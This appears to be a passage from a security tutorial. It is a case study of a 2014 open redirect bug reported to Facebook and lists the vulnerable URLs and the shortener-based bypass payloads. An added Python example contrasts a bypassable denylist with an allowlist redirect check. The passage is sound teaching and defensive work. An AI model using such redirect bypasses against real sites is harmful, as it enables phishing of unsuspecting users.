Facebook

On November 13th, 2014, a bug bounty hunter called Yassine Aboukir reported an open redirect vulnerability directly to the Facebook security team. He found two URLs vulnerable to redirection:

https://www.facebook.com/ads/manage/log/?uri=xxxxx&event=view_power_editor&ad_account_id=1
https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=xxxxx

As he mentioned in the report, he first tried the common techniques for exploiting an open redirect, but none of them worked because of the controls Facebook had implemented:

https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=http://www.evil.com/
https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=../evil.com
https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=https://l.facebook.com/l.php?u=http://evil.com

So he used a URL shortener, one of the techniques we reviewed earlier, to bypass Facebook's controls:

https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=http://fb.me/7kFH9QAMH
https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=https://l.facebook.com/l.php?u=http://fb.me/7kFH9QAMH
https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=http://d.fb.me/7kFH9QAMH
https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=http://www.fb.me/7kFH9QAMH
https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=http://www..fb.me/7kFH9QAMH

If you want to learn more about this bug, check the researcher's blog: https://yassineaboukir.com/blog/how-i-discovered-a-1000-open-redirect-in-facebook/.
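The case study shows the weakness of a denylist: the filter recognised `evil.com` and `../`, but a link on a shortener domain passed because the filter had no way of knowing where the short link would eventually land. The following example is added here and is not code from the book or from Facebook; it contrasts a denylist check of the kind that was bypassed with an allowlist check that only accepts same-origin paths or exact hosts the application actually needs. The allowed and redirector host sets are assumptions for illustration, and the test targets are the `groupuri` values quoted above plus a couple of constructed variants.

```python
"""Redirect-target validation: denylist (bypassable) vs. allowlist (added example)."""
from urllib.parse import urlsplit

# Assumption: the application only ever needs to redirect to these hosts.
ALLOWED_HOSTS = {"www.facebook.com", "facebook.com"}

# Hosts that are themselves redirectors (shorteners, link wrappers). A target
# on one of these can resolve to any destination, so they must never be
# treated as trusted landing hosts. Assumed list for the example.
REDIRECTOR_HOSTS = {"fb.me", "d.fb.me", "www.fb.me", "l.facebook.com"}

# Targets quoted in the case study (constructed list, values taken from the text).
CASE_STUDY_TARGETS = [
    "http://www.evil.com/",
    "../evil.com",
    "https://l.facebook.com/l.php?u=http://evil.com",
    "http://fb.me/7kFH9QAMH",
    "http://d.fb.me/7kFH9QAMH",
    "http://www.fb.me/7kFH9QAMH",
    "http://www..fb.me/7kFH9QAMH",
]


def denylist_check(target: str) -> bool:
    """Models the kind of filter the report shows being bypassed: reject a
    few known-bad patterns and accept everything else. A shortener link
    contains none of the patterns, so it sails through."""
    lowered = target.lower()
    if "evil.com" in lowered:
        return False
    if lowered.startswith("../"):
        return False
    return True


def allowlist_check(target: str) -> bool:
    """Accept only a same-origin absolute path or an http(s) URL whose host
    is exactly allowlisted. Shorteners and link wrappers are refused even
    if someone later adds them to ALLOWED_HOSTS by mistake."""
    parts = urlsplit(target)

    # No scheme and no authority: a local path. It must start with a single
    # slash; "//host" is scheme-relative and would leave the origin, and
    # "../x" is not a path the server should be asked to redirect to.
    if not parts.scheme and not parts.netloc:
        return target.startswith("/") and not target.startswith("//")

    if parts.scheme not in ("http", "https"):
        return False

    # hostname drops userinfo and port, so "http://www.facebook.com@evil.com/"
    # yields "evil.com"; a trailing dot is stripped so "fb.me." cannot sneak by.
    host = (parts.hostname or "").lower().rstrip(".")
    if host in REDIRECTOR_HOSTS:
        return False
    return host in ALLOWED_HOSTS


def compare(targets=CASE_STUDY_TARGETS) -> dict:
    """Return {target: (denylist_result, allowlist_result)} for each target."""
    return {t: (denylist_check(t), allowlist_check(t)) for t in targets}


if __name__ == "__main__":
    for target, (deny, allow) in compare().items():
        print(f"{target:55s} denylist={'pass' if deny else 'block'} "
              f"allowlist={'pass' if allow else 'block'}")
```

Running the script prints one line per target; every shortener link passes the denylist and is blocked by the allowlist, which is the whole difference between the two approaches. Note that the redirector set is a belt-and-braces guard: the real protection is that only the exact hosts the application needs are allowed, and a shortener is never one of them.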
